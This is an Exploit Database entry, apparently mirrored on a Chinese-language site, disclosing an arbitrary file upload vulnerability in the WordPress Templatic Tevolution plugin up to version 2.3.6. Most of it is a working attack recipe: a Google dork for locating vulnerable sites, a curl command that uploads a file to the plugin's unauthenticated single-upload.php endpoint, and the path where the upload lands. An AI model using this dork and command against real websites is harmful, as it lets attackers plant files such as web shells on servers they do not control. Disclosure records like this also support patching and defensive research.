WordPress Plugin Slider Templatic Tevolution < 2.3.6 - Arbitrary File Upload

• Exploit Database
• 12 阅读

• 作者： r3m1ck
  日期： 2016-12-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40976/

• # Exploit Title: WordPress Templatic <= 2.3.6 Tevolution File Upload Vulnerability
  # Date: 30-12-2016
  # Software Link: Permium plugin
  # Vendor Homepage: https://templatic.com/wordpress-plugins/tevolution
  # Exploit Author: r3m1ck
  # Website: https://www.r3m1ck.us/
  # Category: webapps
  # Google Dork: inurl:"wp-content/plugins/Tevolution/"
  
  1. Description
  
  Wordpress Slider Templatic Tevolution <= 2.3.6 suffers from file upload vulnerability.
  Tevolution is not available for sale, it comes bundled with certain premium themes from templatic.
  
  2. Proof of Concept
  
  curl -k -X POST -F "file=@./ina.txt" http://VICTIM/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php
  
  3. Uploaded file location:
  
  Because this vulnerability plugin bundled with some premium themes from templatic, the location will be depends on the themes' name.
  ex:
  http://VICTIM/wp-content/themes/Directory/images/tmp/ina.txt